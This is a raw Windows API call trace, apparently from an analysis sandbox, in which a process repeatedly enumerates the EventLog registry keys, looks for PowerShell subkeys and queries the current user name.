	[0339.079] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.079] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.079] CoTaskMemFree (pv=0x114ad0) 
	[0339.079] CoTaskMemFree (pv=0x0) 
	[0339.079] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.079] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.079] CoTaskMemFree (pv=0x114ad0) 
	[0339.079] CoTaskMemFree (pv=0x0) 
	[0339.079] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.079] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.079] CoTaskMemFree (pv=0x114ad0) 
	[0339.079] CoTaskMemFree (pv=0x0) 
	[0339.079] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.079] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.079] CoTaskMemFree (pv=0x114ad0) 
	[0339.079] CoTaskMemFree (pv=0x0) 
	[0339.080] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.080] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.080] CoTaskMemFree (pv=0x114ad0) 
	[0339.080] CoTaskMemFree (pv=0x0) 
	[0339.080] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.080] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.080] CoTaskMemFree (pv=0x114ad0) 
	[0339.080] CoTaskMemFree (pv=0x0) 
	[0339.080] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.080] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.080] CoTaskMemFree (pv=0x114ad0) 
	[0339.080] CoTaskMemFree (pv=0x0) 
	[0339.080] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.080] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.080] CoTaskMemFree (pv=0x114ad0) 
	[0339.080] CoTaskMemFree (pv=0x0) 
	[0339.080] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.080] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x114ad0, lpcchName=0x26d0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.080] CoTaskMemFree (pv=0x114ad0) 
	[0339.080] CoTaskMemFree (pv=0x0) 
	[0339.080] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x328) returned 0x0
	[0339.081] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.081] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x300) returned 0x0
	[0339.081] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.081] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x32c) returned 0x0
	[0339.081] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.081] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x330) returned 0x0
	[0339.081] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.081] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x334) returned 0x0
	[0339.081] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.082] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x338) returned 0x0
	[0339.082] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.082] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x33c) returned 0x0
	[0339.082] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.082] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x340) returned 0x0
	[0339.082] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x0) returned 0x2
	[0339.082] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x344) returned 0x0
	[0339.082] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d138 | out: phkResult=0x26d138*=0x348) returned 0x0
	[0339.083] RegCloseKey (hKey=0x348) returned 0x0
	[0339.083] RegCloseKey (hKey=0x318) returned 0x0
	[0339.084] RegCloseKey (hKey=0x344) returned 0x0
	[0339.433] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0339.433] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0339.434] CoTaskMemFree (pv=0x1b91a6c0) 
	[0339.435] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.435] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0339.435] CoTaskMemFree (pv=0x114ad0) 
	[0340.735] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x34c) returned 0x0
	[0340.735] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26cffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26cffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.735] CoTaskMemFree (pv=0x0) 
	[0340.735] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.735] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.735] CoTaskMemFree (pv=0x114ad0) 
	[0340.735] CoTaskMemFree (pv=0x0) 
	[0340.736] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.736] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.736] CoTaskMemFree (pv=0x114ad0) 
	[0340.736] CoTaskMemFree (pv=0x0) 
	[0340.736] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.736] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.736] CoTaskMemFree (pv=0x114ad0) 
	[0340.736] CoTaskMemFree (pv=0x0) 
	[0340.736] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.736] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.736] CoTaskMemFree (pv=0x114ad0) 
	[0340.736] CoTaskMemFree (pv=0x0) 
	[0340.736] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.736] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.736] CoTaskMemFree (pv=0x114ad0) 
	[0340.736] CoTaskMemFree (pv=0x0) 
	[0340.736] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.736] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.736] CoTaskMemFree (pv=0x114ad0) 
	[0340.736] CoTaskMemFree (pv=0x0) 
	[0340.736] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.736] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.737] CoTaskMemFree (pv=0x114ad0) 
	[0340.737] CoTaskMemFree (pv=0x0) 
	[0340.737] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.737] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.737] CoTaskMemFree (pv=0x114ad0) 
	[0340.737] CoTaskMemFree (pv=0x0) 
	[0340.737] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.737] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.737] CoTaskMemFree (pv=0x114ad0) 
	[0340.737] CoTaskMemFree (pv=0x0) 
	[0340.737] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x350) returned 0x0
	[0340.737] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.737] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x354) returned 0x0
	[0340.737] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.737] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x358) returned 0x0
	[0340.737] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.751] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x33c) returned 0x0
	[0340.751] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.751] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x340) returned 0x0
	[0340.751] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.751] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x358) returned 0x0
	[0340.751] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.752] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x350) returned 0x0
	[0340.752] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.752] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x354) returned 0x0
	[0340.752] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.752] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x304) returned 0x0
	[0340.752] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x308) returned 0x0
	[0340.752] RegCloseKey (hKey=0x308) returned 0x0
	[0340.752] RegCloseKey (hKey=0x34c) returned 0x0
	[0340.753] RegCloseKey (hKey=0x304) returned 0x0
	[0340.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x304) returned 0x0
	[0340.753] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26cffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26cffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.754] CoTaskMemFree (pv=0x0) 
	[0340.754] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.754] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.754] CoTaskMemFree (pv=0x114ad0) 
	[0340.754] CoTaskMemFree (pv=0x0) 
	[0340.754] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.754] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.754] CoTaskMemFree (pv=0x114ad0) 
	[0340.754] CoTaskMemFree (pv=0x0) 
	[0340.754] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.754] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.754] CoTaskMemFree (pv=0x114ad0) 
	[0340.754] CoTaskMemFree (pv=0x0) 
	[0340.754] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.754] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.754] CoTaskMemFree (pv=0x114ad0) 
	[0340.754] CoTaskMemFree (pv=0x0) 
	[0340.755] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.755] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.755] CoTaskMemFree (pv=0x114ad0) 
	[0340.755] CoTaskMemFree (pv=0x0) 
	[0340.755] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.755] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.755] CoTaskMemFree (pv=0x114ad0) 
	[0340.755] CoTaskMemFree (pv=0x0) 
	[0340.755] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.755] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.755] CoTaskMemFree (pv=0x114ad0) 
	[0340.755] CoTaskMemFree (pv=0x0) 
	[0340.755] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.755] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.755] CoTaskMemFree (pv=0x114ad0) 
	[0340.755] CoTaskMemFree (pv=0x0) 
	[0340.755] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.755] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x114ad0, lpcchName=0x26d088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.755] CoTaskMemFree (pv=0x114ad0) 
	[0340.755] CoTaskMemFree (pv=0x0) 
	[0340.756] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x34c) returned 0x0
	[0340.756] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.756] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x308) returned 0x0
	[0340.756] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.756] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x328) returned 0x0
	[0340.756] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.756] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x300) returned 0x0
	[0340.756] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.756] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x32c) returned 0x0
	[0340.756] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.757] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x330) returned 0x0
	[0340.757] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.757] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x334) returned 0x0
	[0340.757] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.757] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x338) returned 0x0
	[0340.757] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x0) returned 0x2
	[0340.757] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x35c) returned 0x0
	[0340.757] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0e8 | out: phkResult=0x26d0e8*=0x360) returned 0x0
	[0340.757] RegCloseKey (hKey=0x360) returned 0x0
	[0340.757] RegCloseKey (hKey=0x304) returned 0x0
	[0340.758] RegCloseKey (hKey=0x35c) returned 0x0
	[0340.759] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d058 | out: phkResult=0x26d058*=0x35c) returned 0x0
	[0340.759] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26cfcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cfc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26cfcc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cfc8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.759] CoTaskMemFree (pv=0x0) 
	[0340.759] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.759] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
